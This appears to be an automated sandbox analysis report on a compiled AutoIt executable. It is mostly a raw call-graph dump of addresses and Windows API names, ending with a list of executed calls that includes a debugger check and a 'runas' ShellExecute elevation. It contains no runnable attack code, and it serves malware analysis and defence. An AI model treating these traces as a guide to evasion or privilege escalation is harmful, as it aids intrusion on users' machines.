e2895c 98483->98485 98486 e28997 98485->98486 98488 e2897a 98485->98488 98492 e35376 98485->98492 98486->98402 98489 e29f66 TlsSetValue 98486->98489 98488->98485 98488->98486 98500 e2a2b2 Sleep 98488->98500 98489->98405 98490->98409 98491->98406 98493 e35381 98492->98493 98497 e3539c 98492->98497 98494 e3538d 98493->98494 98493->98497 98501 e28ca8 58 API calls __getptd_noexit 98494->98501 98495 e353ac RtlAllocateHeap 98495->98497 98498 e35392 98495->98498 98497->98495 98497->98498 98502 e23521 DecodePointer 98497->98502 98498->98485 98500->98488 98501->98498 98502->98497 98503->98424 98504->98426 98505->98417 98506->98433 98507->98436 98508->98443 98510 e28f51 98509->98510 98515 e28dd9 98510->98515 98514 e28f6c 98514->98452 98516 e28df3 _memset __call_reportfault 98515->98516 98517 e28e13 IsDebuggerPresent 98516->98517 98523 e2a2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 98517->98523 98519 e2c776 __crtGetStringTypeA_stat 6 API calls 98520 e28efa 98519->98520 98522 e2a2c0 GetCurrentProcess TerminateProcess 98520->98522 98521 e28ed7 __call_reportfault 98521->98519 98522->98514 98523->98521 98525 e2a654 EncodePointer 98524->98525 98525->98525 98526 e2a66e 98525->98526 98526->98456 98528 e29d8b __lock 58 API calls 98527->98528 98529 e234f7 DecodePointer EncodePointer 98528->98529 98592 e29ef5 LeaveCriticalSection 98529->98592 98531 e049a7 98532 e23554 98531->98532 98533 e23578 98532->98533 98534 e2355e 98532->98534 98533->98465 98534->98533 98593 e28ca8 58 API calls __getptd_noexit 98534->98593 98536 e23568 98594 e28f36 9 API calls _W_expandtime 98536->98594 98538 e23573 98538->98465 98539->98467 98541 e03b59 __ftell_nolock 98540->98541 98542 e077c7 59 API calls 98541->98542 98543 e03b63 GetCurrentDirectoryW 98542->98543 98595 e03778 98543->98595 98545 e03b8c IsDebuggerPresent 98546 e03b9a 98545->98546 98547 e3d3dd MessageBoxA 98545->98547 98548 e3d3f7 98546->98548 98549 e03bb7 98546->98549 98579 e03c73 98546->98579 98547->98548 98728 e07373 59 API calls Mailbox 98548->98728 98676 e073e5 98549->98676 98550 e03c7a SetCurrentDirectoryW 98554 e03c87 Mailbox 98550->98554 98554->98469 98556 e3d407 98559 e3d41d SetCurrentDirectoryW 98556->98559 98559->98554 98579->98550 98592->98531 98593->98536 98594->98538 98596 e077c7 59 API calls 98595->98596 98597 e0378e 98596->98597 98737 e03d43 98597->98737 98599 e037ac 98600 e04864 61 API calls 98599->98600 98601 e037c0 98600->98601 98602 e07f41 59 API calls 98601->98602 98603 e037cd 98602->98603 98604 e04f3d 136 API calls 98603->98604 98605 e037e6 98604->98605 98606 e3d2de 98605->98606 98607 e037ee Mailbox 98605->98607 98779 e69604 98606->98779 98611 e081a7 59 API calls 98607->98611 98610 e3d2fd 98613 e22ed5 _free 58 API calls 98610->98613 98614 e03801 98611->98614 98612 e04faa 84 API calls 98612->98610 98615 e3d30a 98613->98615 98751 e093ea 98614->98751 98617 e04faa 84 API calls 98615->98617 98619 e3d313 98617->98619 98623 e03ee2 59 API calls 98619->98623 98620 e07f41 59 API calls 98621 e0381a 98620->98621 98622 e08620 69 API calls 98621->98622 98624 e0382c Mailbox 98622->98624 98625 e3d32e 98623->98625 98626 e07f41 59 API calls 98624->98626 98627 e03ee2 59 API calls 98625->98627 98628 e03852 98626->98628 98629 e3d34a 98627->98629 98630 e08620 69 API calls 98628->98630 98631 e04864 61 API calls 98629->98631 98633 e03861 Mailbox 98630->98633 98632 e3d36f 98631->98632 98634 e03ee2 59 API calls 98632->98634 98636 e077c7 59 API calls 98633->98636 98635 e3d37b 98634->98635 98637 e081a7 59 API calls 98635->98637 98638 e0387f 98636->98638 98639 e3d389 98637->98639 98754 e03ee2 98638->98754 98641 e03ee2 59 API calls 98639->98641 98643 e3d398 98641->98643 98649 e081a7 59 API calls 98643->98649 98645 e03899 98645->98619 98646 e038a3 98645->98646 98647 e2307d _W_store_winword 60 API calls 98646->98647 98648 e038ae 98647->98648 98648->98625 98650 e038b8 98648->98650 98651 e3d3ba 98649->98651 98652 e2307d _W_store_winword 60 API calls 98650->98652 98653 e03ee2 59 API calls 98651->98653 98654 e038c3 98652->98654 98655 e3d3c7 98653->98655 98654->98629 98656 e038cd 98654->98656 98655->98655 98657 e2307d _W_store_winword 60 API calls 98656->98657 98658 e038d8 98657->98658 98658->98643 98659 e03919 98658->98659 98661 e03ee2 59 API calls 98658->98661 98659->98643 98660 e03926 98659->98660 98662 e0942e 59 API calls 98660->98662 98663 e038fc 98661->98663 98664 e03936 98662->98664 98665 e081a7 59 API calls 98663->98665 98666 e091b0 59 API calls 98664->98666 98667 e0390a 98665->98667 98668 e03944 98666->98668 98669 e03ee2 59 API calls 98667->98669 98770 e09040 98668->98770 98669->98659 98671 e03961 98672 e093ea 59 API calls 98671->98672 98673 e09040 60 API calls 98671->98673 98674 e03ee2 59 API calls 98671->98674 98675 e039a7 Mailbox 98671->98675 98672->98671 98673->98671 98674->98671 98675->98545 98677 e073f2 __ftell_nolock 98676->98677 98678 e3ed7b _memset 98677->98678 98679 e0740b 98677->98679 98681 e3ed97 GetOpenFileNameW 98678->98681 98826 e048ae 98679->98826 98683 e3ede6 98681->98683 98685 e07d2c 59 API calls 98683->98685 98687 e3edfb 98685->98687 98687->98687 98689 e07429 98854 e069ca 98689->98854 98728->98556 98738 e03d50 __ftell_nolock 98737->98738 98739 e07d2c 59 API calls 98738->98739 98743 e03eb6 Mailbox 98738->98743 98741 e03d82 98739->98741 98740 e07b52 59 API calls 98740->98741 98741->98740 98749 e03db8 Mailbox 98741->98749 98742 e03e89 98742->98743 98744 e07f41 59 API calls 98742->98744 98743->98599 98746 e03eaa 98744->98746 98745 e07f41 59 API calls 98745->98749 98748 e03f84 59 API calls 98746->98748 98747 e07b52 59 API calls 98747->98749 98748->98743 98749->98742 98749->98743 98749->98745 98749->98747 98814 e03f84 98749->98814 98752 e20f36 Mailbox 59 API calls 98751->98752 98753 e0380d 98752->98753 98753->98620 98755 e03f05 98754->98755 98756 e03eec 98754->98756 98757 e07d2c 59 API calls 98755->98757 98758 e081a7 59 API calls 98756->98758 98759 e0388b 98757->98759 98758->98759 98760 e2307d 98759->98760 98761 e23089 98760->98761 98762 e230fe 98760->98762 98766 e230ae 98761->98766 98820 e28ca8 58 API calls __getptd_noexit 98761->98820 98822 e23110 60 API calls 4 library calls 98762->98822 98765 e2310b 98765->98645 98766->98645 98767 e23095 98821 e28f36 9 API calls _W_expandtime 98767->98821 98769 e230a0 98769->98645 98771 e3f4d5 98770->98771 98774 e09057 98770->98774 98771->98774 98824 e08d3b 59 API calls Mailbox 98771->98824 98773 e0915f 98773->98671 98774->98773 98775 e091a0 98774->98775 98776 e09158 98774->98776 98823 e09e9c 60 API calls Mailbox 98775->98823 98777 e20f36 Mailbox 59 API calls 98776->98777 98777->98773 98780 e05045 85 API calls 98779->98780 98781 e69673 98780->98781 98782 e697dd 96 API calls 98781->98782 98783 e69685 98782->98783 98784 e0506b 74 API calls 98783->98784 98810 e3d2f1 98783->98810 98785 e696a0 98784->98785 98786 e0506b 74 API calls 98785->98786 98787 e696b0 98786->98787 98788 e0506b 74 API calls 98787->98788 98789 e696cb 98788->98789 98790 e0506b 74 API calls 98789->98790 98791 e696e6 98790->98791 98792 e05045 85 API calls 98791->98792 98793 e696fd 98792->98793 98794 e2588c __crtGetStringTypeA_stat 58 API calls 98793->98794 98795 e69704 98794->98795 98796 e2588c __crtGetStringTypeA_stat 58 API calls 98795->98796 98797 e6970e 98796->98797 98798 e0506b 74 API calls 98797->98798 98799 e69722 98798->98799 98800 e691b2 GetSystemTimeAsFileTime 98799->98800 98801 e69735 98800->98801 98802 e6975f 98801->98802 98803 e6974a 98801->98803 98805 e697c4 98802->98805 98806 e69765 98802->98806 98804 e22ed5 _free 58 API calls 98803->98804 98808 e69750 98804->98808 98807 e22ed5 _free 58 API calls 98805->98807 98825 e68baf 116 API calls __fcloseall 98806->98825 98807->98810 98811 e22ed5 _free 58 API calls 98808->98811 98810->98610 98810->98612 98811->98810 98812 e697bc 98813 e22ed5 _free 58 API calls 98812->98813 98813->98810 98815 e03f92 98814->98815 98819 e03fb4 _memmove 98814->98819 98817 e20f36 Mailbox 59 API calls 98815->98817 98816 e20f36 Mailbox 59 API calls 98818 e03fc8 98816->98818 98817->98819 98818->98749 98819->98816 98820->98767 98821->98769 98822->98765 98823->98773 98824->98774 98825->98812 98888 e31ac0 98826->98888 98829 e048f7 98832 e07eec 59 API calls 98829->98832 98830 e048da 98831 e07d2c 59 API calls 98830->98831 98833 e048e6 98831->98833 98832->98833 98890 e07886 98833->98890 98836 e20911 98837 e31ac0 __ftell_nolock 98836->98837 98838 e2091e GetLongPathNameW 98837->98838 98839 e07d2c 59 API calls 98838->98839 98840 e0741d 98839->98840 98841 e0716b 98840->98841 98842 e077c7 59 API calls 98841->98842 98843 e0717d 98842->98843 98844 e048ae 60 API calls 98843->98844 98845 e07188 98844->98845 98846 e07193 98845->98846 98849 e3ebde 98845->98849 98848 e03f84 59 API calls 98846->98848 98850 e0719f 98848->98850 98851 e3ebf8 98849->98851 98900 e07a68 61 API calls 98849->98900 98894 e034c2 98850->98894 98853 e071b2 Mailbox 98853->98689 98855 e04f3d 136 API calls 98854->98855 98856 e069ef 98855->98856 98857 e3e38a 98856->98857 98859 e04f3d 136 API calls 98856->98859 98858 e69604 122 API calls 98857->98858 98861 e3e39f 98858->98861 98860 e06a03 98859->98860 98860->98857 98862 e06a0b 98860->98862 98863 e3e3a3 98861->98863 98864 e3e3c0 98861->98864 98865 e06a17 98862->98865 98866 e3e3ab 98862->98866 98867 e04faa 84 API calls 98863->98867 98868 e20f36 Mailbox 59 API calls 98864->98868 98901 e06bec 98865->98901 99011 e64339 90 API calls _wprintf 98866->99011 98867->98866 98887 e3e405 Mailbox 98868->98887 98872 e3e3b9 98872->98864 98873 e3e5b9 98874 e22ed5 _free 58 API calls 98873->98874 98875 e3e5c1 98874->98875 98876 e04faa 84 API calls 98875->98876 98881 e3e5ca 98876->98881 98880 e22ed5 _free 58 API calls 98880->98881 98881->98880 98882 e04faa 84 API calls 98881->98882 99014 e5fad2 89 API calls 4 library calls 98881->99014 98882->98881 98884 e07f41 59 API calls 98884->98887 98887->98873 98887->98881 98887->98884 98994 e5fa6e 98887->98994 98997 e0766f 98887->98997 99005 e074bd 98887->99005 99012 e5f98f 61 API calls 2 library calls 98887->99012 99013 e67428 59 API calls Mailbox 98887->99013 98889 e048bb GetFullPathNameW 98888->98889 98889->98829 98889->98830 98891 e07894 98890->98891 98892 e07e8c 59 API calls 98891->98892 98893 e048f2 98892->98893 98893->98836 98895 e034d4 98894->98895 98899 e034f3 _memmove 98894->98899 98898 e20f36 Mailbox 59 API calls 98895->98898 98896 e20f36 Mailbox 59 API calls 98897 e0350a 98896->98897 98897->98853 98898->98899 98899->98896 98900->98849 98902 e3e777 98901->98902 98903 e06c15 98901->98903 99036 e5fad2 89 API calls 4 library calls 98902->99036 99020 e05906 60 API calls Mailbox 98903->99020 98906 e06c37 99021 e05956 67 API calls 98906->99021 98907 e3e78a 99037 e5fad2 89 API calls 4 library calls 98907->99037 98909 e06c4c 98909->98907 98910 e06c54 98909->98910 98912 e077c7 59 API calls 98910->98912 98914 e06c60 98912->98914 98913 e3e7a6 98916 e06cc1 98913->98916 99022 e20ad7 60 API calls __ftell_nolock 98914->99022 98918 e3e7b9 98916->98918 98919 e06ccf 98916->98919 98917 e06c6c 98921 e077c7 59 API calls 98917->98921 98922 e05dcf CloseHandle 98918->98922 98920 e077c7 59 API calls 98919->98920 98923 e06cd8 98920->98923 98924 e06c78 98921->98924 98925 e3e7c5 98922->98925 98927 e077c7 59 API calls 98923->98927 98928 e048ae 60 API calls 98924->98928 98926 e04f3d 136 API calls 98925->98926 98929 e3e7e1 98926->98929 98930 e06ce1 98927->98930 98931 e06c86 98928->98931 98932 e3e80a 98929->98932 98935 e69604 122 API calls 98929->98935 98933 e046f9 59 API calls 98930->98933 99023 e059b0 ReadFile SetFilePointerEx 98931->99023 99038 e5fad2 89 API calls 4 library calls 98932->99038 98936 e06cf8 98933->98936 98939 e3e7fd 98935->98939 98940 e07c8e 59 API calls 98936->98940 98938 e06cb2 99024 e05c4e SetFilePointerEx SetFilePointerEx 98938->99024 98943 e3e826 98939->98943 98944 e3e805 98939->98944 98945 e06d09 SetCurrentDirectoryW 98940->98945 98941 e3e821 98950 e06e6c Mailbox 98941->98950 98947 e04faa 84 API calls 98943->98947 98946 e04faa 84 API calls 98944->98946 98951 e06d1c Mailbox 98945->98951 98946->98932 98948 e3e82b 98947->98948 98949 e20f36 Mailbox 59 API calls 98948->98949 98956 e3e85f 98949->98956 99015 e05934 98950->99015 98953 e20f36 Mailbox 59 API calls 98951->98953 98955 e06d2f 98953->98955 98954 e03bcd 98954->98579 98957 e0538e 59 API calls 98955->98957 98959 e0766f 59 API calls 98956->98959 98958 e06d3a Mailbox __wsetenvp 98957->98958 98960 e06e47 98958->98960 98971 e3eb32 98958->98971 98978 e3eb2a 98958->98978 98980 e07f41 59 API calls 98958->98980 99025 e059cd 67 API calls _wcscpy 98958->99025 99026 e070bd GetStringTypeW 98958->99026 99027 e0702c 60 API calls __wcsnicmp 98958->99027 99028 e0710a GetStringTypeW __wsetenvp 98958->99028 99029 e237bd GetStringTypeW _iswctype 98958->99029 99030 e06a3c 165 API calls 3 library calls 98958->99030 99031 e07373 59 API calls Mailbox 98958->99031 98990 e3e8a8 Mailbox 98959->98990 98963 e3ea99 98976 e0766f 59 API calls 98976->98990 98980->98958 98983 e5fa6e 59 API calls 98983->98990 98984 e07f41 59 API calls 98984->98990 98987 e3eaeb 98990->98963 98990->98976 98990->98983 98990->98984 98990->98987 99039 e5f98f 61 API calls 2 library calls 98990->99039 99040 e67428 59 API calls Mailbox 98990->99040 98995 e20f36 Mailbox 59 API calls 98994->98995 98996 e5fa9e _memmove 98995->98996 98996->98887 98998 e0770f 98997->98998 99001 e07682 _memmove 98997->99001 99000 e20f36 Mailbox 59 API calls 98998->99000 98999 e20f36 Mailbox 59 API calls 99002 e07689 98999->99002 99000->99001 99001->98999 99003 e20f36 Mailbox 59 API calls 99002->99003 99004 e076b2 99002->99004 99003->99004 99004->98887 99006 e074d0 99005->99006 99010 e0757e 99005->99010 99007 e20f36 Mailbox 59 API calls 99006->99007 99009 e07502 99006->99009 99007->99009 99008 e20f36 59 API calls Mailbox 99008->99009 99009->99008 99009->99010 99010->98887 99011->98872 99012->98887 99013->98887 99014->98881 99016 e05dcf CloseHandle 99015->99016 99017 e0593c Mailbox 99016->99017 99018 e05dcf CloseHandle 99017->99018 99019 e0594b 99018->99019 99019->98954 99020->98906 99021->98909 99022->98917 99023->98938 99024->98916 99025->98958 99026->98958 99027->98958 99028->98958 99029->98958 99030->98958 99031->98958 99036->98907 99037->98913 99038->98941 99039->98990 99040->98990 99096 e40155 99103 e0ae4f Mailbox 99096->99103 99097 e0b6d1 99149 e69ed4 89 API calls 4 library calls 99097->99149 99099 e40bb5 99150 e563f2 99099->99150 99101 e40bbe 99103->99097 99103->99099 99103->99101 99106 e687be 99103->99106 99110 e821aa 99103->99110 99148 e09df0 59 API calls Mailbox 99103->99148 99107 e687c7 99106->99107 99108 e687cc 99106->99108 99153 e6785c 99107->99153 99108->99103 99111 e077c7 59 API calls 99110->99111 99112 e821c1 99111->99112 99113 e09997 84 API calls 99112->99113 99114 e821d0 99113->99114 99115 e07b76 59 API calls 99114->99115 99116 e821e3 99115->99116 99117 e09997 84 API calls 99116->99117 99118 e821f0 99117->99118 99119 e8220a 99118->99119 99120 e8227e 99118->99120 99195 e09c9c 59 API calls 99119->99195 99122 e09997 84 API calls 99120->99122 99124 e82283 99122->99124 99123 e8220f 99125 e8226d 99123->99125 99128 e82226 99123->99128 99126 e822af 99124->99126 99127 e82291 99124->99127 99196 e09bf8 59 API calls Mailbox 99125->99196 99130 e822c4 99126->99130 99198 e09c9c 59 API calls 99126->99198 99197 e09bf8 59 API calls Mailbox 99127->99197 99132 e079ab 59 API calls 99128->99132 99134 e822d9 99130->99134 99199 e09c9c 59 API calls 99130->99199 99136 e82233 99132->99136 99135 e080d7 59 API calls 99134->99135 99138 e822f3 99135->99138 99139 e07c8e 59 API calls 99136->99139 99176 e5f713 99138->99176 99141 e82241 99139->99141 99142 e079ab 59 API calls 99141->99142 99143 e8225a 99142->99143 99144 e07c8e 59 API calls 99143->99144 99147 e82268 99144->99147 99145 e8227a Mailbox 99145->99103 99200 e09b9c 59 API calls Mailbox 99147->99200 99148->99103 99149->99099 99201 e56334 99150->99201 99152 e56400 99152->99101 99154 e67993 99153->99154 99155 e67873 99153->99155 99154->99108 99156 e6788b 99155->99156 99157 e678b3 99155->99157 99161 e678ca 99155->99161 99156->99157 99165 e6789b 99156->99165 99158 e20f36 Mailbox 59 API calls 99157->99158 99159 e678a9 Mailbox _memmove 99158->99159 99168 e20f36 Mailbox 59 API calls 99159->99168 99160 e678e7 99160->99159 99163 e67912 99160->99163 99164 e67920 99160->99164 99161->99160 99162 e20f36 Mailbox 59 API calls 99161->99162 99162->99160 99166 e20f36 Mailbox 59 API calls 99163->99166 99167 e20f36 Mailbox 59 API calls 99164->99167 99169 e20f36 Mailbox 59 API calls 99165->99169 99166->99159 99170 e67926 99167->99170 99168->99154 99169->99159 99174 e67514 59 API calls Mailbox 99170->99174 99172 e67932 99175 e05b75 61 API calls Mailbox 99172->99175 99174->99172 99175->99159 99177 e077c7 59 API calls 99176->99177 99178 e5f726 99177->99178 99179 e07b76 59 API calls 99178->99179 99180 e5f73a 99179->99180 99181 e5f479 61 API calls 99180->99181 99188 e5f75c 99180->99188 99182 e5f756 99181->99182 99184 e079ab 59 API calls 99182->99184 99182->99188 99183 e5f479 61 API calls 99183->99188 99184->99188 99185 e5f7d6 99187 e079ab 59 API calls 99185->99187 99186 e079ab 59 API calls 99186->99188 99189 e5f7ef 99187->99189 99188->99183 99188->99185 99188->99186 99190 e07c8e 59 API calls 99188->99190 99191 e07c8e 59 API calls 99189->99191 99190->99188 99192 e5f7fb 99191->99192 99193 e080d7 59 API calls 99192->99193 99194 e5f80a Mailbox 99192->99194 99193->99194 99194->99147 99195->99123 99196->99145 99197->99145 99198->99130 99199->99134 99200->99145 99202 e5635c 99201->99202 99203 e5633f 99201->99203 99202->99152 99203->99202 99205 e5631f 59 API calls Mailbox 99203->99205 99205->99203 99206 e03633 99207 e0366a 99206->99207 99208 e036e7 99207->99208 99209 e03688 99207->99209 99247 e036e5 99207->99247 99211 e036ed 99208->99211 99212 e3d24c 99208->99212 99213 e03695 99209->99213 99214 e0375d PostQuitMessage 99209->99214 99210 e036ca DefWindowProcW 99216 e036d8 99210->99216 99217 e036f2 99211->99217 99218 e03715 SetTimer RegisterWindowMessageW 99211->99218 99256 e111d0 10 API calls Mailbox 99212->99256 99219 e036a0 99213->99219 99220 e3d2bf 99213->99220 99214->99216 99223 e036f9 KillTimer 99217->99223 99224 e3d1ef 99217->99224 99218->99216 99225 e0373e CreatePopupMenu 99218->99225 99226 e03767 99219->99226 99227 e036a8 99219->99227 99260 e6281f 71 API calls _memset 99220->99260 99222 e3d273 99257 e111f3 341 API calls Mailbox 99222->99257 99251 e044cb Shell_NotifyIconW _memset 99223->99251 99233 e3d1f4 99224->99233 99234 e3d228 MoveWindow 99224->99234 99225->99216 99254 e04531 64 API calls _memset 99226->99254 99228 e036b3 99227->99228 99229 e3d2a4 99227->99229 99236 e0374b 99228->99236 99237 e036be 99228->99237 99229->99210 99259 e57f5e 59 API calls Mailbox 99229->99259 99230 e3d2d1 99230->99210 99230->99216 99239 e3d217 SetFocus 99233->99239 99240 e3d1f8 99233->99240 99234->99216 99253 e045df 81 API calls _memset 99236->99253 99237->99210 99258 e044cb Shell_NotifyIconW _memset 99237->99258 99238 e0375b 99238->99216 99239->99216 99240->99237 99243 e3d201 99240->99243 99241 e0370c 99252 e03114 DeleteObject DestroyWindow Mailbox 99241->99252 99255 e111d0 10 API calls Mailbox 99243->99255 99247->99210 99249 e3d298 99250 e043db 68 API calls 99249->99250 99250->99247 99251->99241 99252->99216 99253->99238 99254->99238 99255->99216 99256->99222 99257->99237 99258->99249 99259->99247 99260->99230 99261 e01055 99266 e02649 99261->99266 99264 e22ec0 __cinit 67 API calls 99265 e01064 99264->99265 99267 e077c7 59 API calls 99266->99267 99268 e026b7 99267->99268 99273 e03582 99268->99273 99271 e02754 99272 e0105a 99271->99272 99276 e03416 59 API calls 2 library calls 99271->99276 99272->99264 99277 e035b0 99273->99277 99276->99271 99278 e035bd 99277->99278 99279 e035a1 99277->99279 99278->99279 99280 e035c4 RegOpenKeyExW 99278->99280 99279->99271 99280->99279 99281 e035de RegQueryValueExW 99280->99281 99282 e03614 RegCloseKey 99281->99282 99283 e035ff 99281->99283 99282->99279 99283->99282 99284 e3fe35 99285 e3fe3f 99284->99285 99320 e0ac90 Mailbox _memmove 99284->99320 99381 e08e34 59 API calls Mailbox 99285->99381 99290 e0b5d5 99295 e081a7 59 API calls 99290->99295 99291 e20f36 59 API calls Mailbox 99309 e0a097 Mailbox 99291->99309 99306 e0a1b7 99295->99306 99296 e403ae 99385 e69ed4 89 API calls 4 library calls 99296->99385 99297 e0b5da 99391 e69ed4 89 API calls 4 library calls 99297->99391 99300 e081a7 59 API calls 99300->99309 99301 e07f41 59 API calls 99301->99320 99302 e077c7 59 API calls 99302->99309 99303 e403bd 99304 e571e5 59 API calls 99304->99309 99305 e22ec0 67 API calls __cinit 99305->99309 99308 e563f2 Mailbox 59 API calls 99308->99306 99309->99290 99309->99291 99309->99296 99309->99297 99309->99300 99309->99302 99309->99304 99309->99305 99309->99306 99310 e40d2f 99309->99310 99313 e0a6ba 99309->99313 99375 e0ca20 341 API calls 2 library calls 99309->99375 99376 e0ba60 60 API calls Mailbox 99309->99376 99390 e69ed4 89 API calls 4 library calls 99310->99390 99312 e7bd80 341 API calls 99312->99320 99389 e69ed4 89 API calls 4 library calls 99313->99389 99314 e563f2 Mailbox 59 API calls 99314->99320 99315 e0b416 99380 e0f803 341 API calls 99315->99380 99316 e0a000 341 API calls 99316->99320 99318 e40bc3 99387 e09df0 59 API calls Mailbox 99318->99387 99320->99301 99320->99306 99320->99309 99320->99312 99320->99314 99320->99315 99320->99316 99320->99318 99321 e40bd1 99320->99321 99324 e0b37c 99320->99324 99325 e20f36 59 API calls Mailbox 99320->99325 99329 e0ade2 Mailbox 99320->99329 99331 e0b685 99320->99331 99337 e7c3f4 99320->99337 99369 e679ff 99320->99369 99382 e571e5 59 API calls 99320->99382 99383 e7c2a7 85 API calls 2 library calls 99320->99383 99388 e69ed4 89 API calls 4 library calls 99321->99388 99323 e40bb5 99323->99306 99323->99308 99378 e09e9c 60 API calls Mailbox 99324->99378 99325->99320 99327 e0b38d 99379 e09e9c 60 API calls Mailbox 99327->99379 99329->99331 99334 e0ae4f Mailbox 99329->99334 99384 e571e5 59 API calls 99329->99384 99386 e69ed4 89 API calls 4 library calls 99331->99386 99334->99306 99334->99323 99334->99331 99335 e821aa 87 API calls 99334->99335 99336 e687be 61 API calls 99334->99336 99377 e09df0 59 API calls Mailbox 99334->99377 99335->99334 99336->99334 99338 e077c7 59 API calls 99337->99338 99339 e7c408 99338->99339 99340 e077c7 59 API calls 99339->99340 99341 e7c410 99340->99341 99342 e077c7 59 API calls 99341->99342 99343 e7c418 99342->99343 99344 e09997 84 API calls 99343->99344 99368 e7c426 99344->99368 99345 e07d2c 59 API calls 99345->99368 99346 e7c60f 99347 e7c63c Mailbox 99346->99347 99394 e09b9c 59 API calls Mailbox 99346->99394 99347->99320 99348 e7c5f6 99351 e07e0b 59 API calls 99348->99351 99350 e7c611 99352 e07e0b 59 API calls 99350->99352 99354 e7c603 99351->99354 99356 e7c620 99352->99356 99353 e081a7 59 API calls 99353->99368 99358 e07c8e 59 API calls 99354->99358 99355 e07a84 59 API calls 99355->99368 99359 e07c8e 59 API calls 99356->99359 99357 e07faf 59 API calls 99361 e7c4bd CharUpperBuffW 99357->99361 99358->99346 99359->99346 99360 e07faf 59 API calls 99362 e7c57d CharUpperBuffW 99360->99362 99392 e0859a 68 API calls 99361->99392 99393 e0c707 69 API calls 2 library calls 99362->99393 99365 e07e0b 59 API calls 99365->99368 99366 e09997 84 API calls 99366->99368 99367 e07c8e 59 API calls 99367->99368 99368->99345 99368->99346 99368->99347 99368->99348 99368->99350 99368->99353 99368->99355 99368->99357 99368->99360 99368->99365 99368->99366 99368->99367 99370 e67a0b 99369->99370 99371 e20f36 Mailbox 59 API calls 99370->99371 99372 e67a19 99371->99372 99373 e67a27 99372->99373 99374 e077c7 59 API calls 99372->99374 99373->99320 99374->99373 99375->99309 99376->99309 99377->99334 99378->99327 99379->99315 99380->99331 99381->99320 99382->99320 99383->99320 99384->99329 99385->99303 99386->99323 99387->99323 99388->99323 99389->99306 99390->99297 99391->99306 99392->99368 99393->99368 99394->99347 99395 e01016 99400 e04ad2 99395->99400 99398 e22ec0 __cinit 67 API calls 99399 e01025 99398->99399 99401 e20f36 Mailbox 59 API calls 99400->99401 99402 e04ada 99401->99402 99403 e0101b 99402->99403 99407 e04a94 99402->99407 99403->99398 99408 e04aaf 99407->99408 99409 e04a9d 99407->99409 99411 e04afe 99408->99411 99410 e22ec0 __cinit 67 API calls 99409->99410 99410->99408 99412 e077c7 59 API calls 99411->99412 99413 e04b16 GetVersionExW 99412->99413 99414 e07d2c 59 API calls 99413->99414 99415 e04b59 99414->99415 99416 e07e8c 59 API calls 99415->99416 99419 e04b86 99415->99419 99417 e04b7a 99416->99417 99418 e07886 59 API calls 99417->99418 99418->99419 99420 e04bf1 GetCurrentProcess IsWow64Process 99419->99420 99422 e3dbbd 99419->99422 99421 e04c0a 99420->99421 99423 e04c20 99421->99423 99424 e04c89 GetSystemInfo 99421->99424 99435 e04c95 99423->99435 99425 e04c56 99424->99425 99425->99403 99428 e04c32 99431 e04c95 2 API calls 99428->99431 99429 e04c7d GetSystemInfo 99430 e04c47 99429->99430 99430->99425 99433 e04c4d FreeLibrary 99430->99433 99432 e04c3a GetNativeSystemInfo 99431->99432 99432->99430 99433->99425 99436 e04c2e 99435->99436 99437 e04c9e LoadLibraryA 99435->99437 99436->99428 99436->99429 99437->99436 99438 e04caf GetProcAddress 99437->99438 99438->99436 99439 e0107d 99444 e071eb 99439->99444 99441 e0108c 99442 e22ec0 __cinit 67 API calls 99441->99442 99443 e01096 99442->99443 99445 e071fb __ftell_nolock 99444->99445 99446 e077c7 59 API calls 99445->99446 99447 e072b1 99446->99447 99448 e04864 61 API calls 99447->99448 99449 e072ba 99448->99449 99475 e2068b 99449->99475 99452 e07e0b 59 API calls 99453 e072d3 99452->99453 99454 e03f84 59 API calls 99453->99454 99455 e072e2 99454->99455 99456 e077c7 59 API calls 99455->99456 99457 e072eb 99456->99457 99458 e07eec 59 API calls 99457->99458 99459 e072f4 RegOpenKeyExW 99458->99459 99460 e3ec0a RegQueryValueExW 99459->99460 99464 e07316 Mailbox 99459->99464 99461 e3ec27 99460->99461 99462 e3ec9c RegCloseKey 99460->99462 99463 e20f36 Mailbox 59 API calls 99461->99463 99462->99464 99474 e3ecae _wcscat Mailbox __wsetenvp 99462->99474 99465 e3ec40 99463->99465 99464->99441 99467 e0538e 59 API calls 99465->99467 99466 e07b52 59 API calls 99466->99474 99468 e3ec4b RegQueryValueExW 99467->99468 99469 e3ec68 99468->99469 99471 e3ec82 99468->99471 99470 e07d2c 59 API calls 99469->99470 99470->99471 99471->99462 99472 e07f41 59 API calls 99472->99474 99473 e03f84 59 API calls 99473->99474 99474->99464 99474->99466 99474->99472 99474->99473 99476 e31ac0 __ftell_nolock 99475->99476 99477 e20698 GetFullPathNameW 99476->99477 99478 e206ba 99477->99478 99479 e07d2c 59 API calls 99478->99479 99480 e072c5 99479->99480 99480->99452

                    Executed Functions

                    Function 00E03B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B7A
                    • IsDebuggerPresent.KERNEL32 ref: 00E03B8C
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BFD
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                      • Part of subcall function 00E10A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C26,00EC52F8,?,?,?), ref: 00E10ACE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C81
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EB7770,00000010), ref: 00E3D3EC
                    • SetCurrentDirectoryW.KERNEL32(?,00EC52F8,?,?,?), ref: 00E3D424
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EB4260,00EC52F8,?,?,?), ref: 00E3D4AA
                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E3D4B1
                      • Part of subcall function 00E03A58: GetSysColorBrush.USER32(0000000F), ref: 00E03A62
                      • Part of subcall function 00E03A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E03A71
                      • Part of subcall function 00E03A58: LoadIconW.USER32(00000063), ref: 00E03A88
                      • Part of subcall function 00E03A58: LoadIconW.USER32(000000A4), ref: 00E03A9A
                      • Part of subcall function 00E03A58: LoadIconW.USER32(000000A2), ref: 00E03AAC
                      • Part of subcall function 00E03A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E03AD2
                      • Part of subcall function 00E03A58: RegisterClassExW.USER32(?), ref: 00E03B28
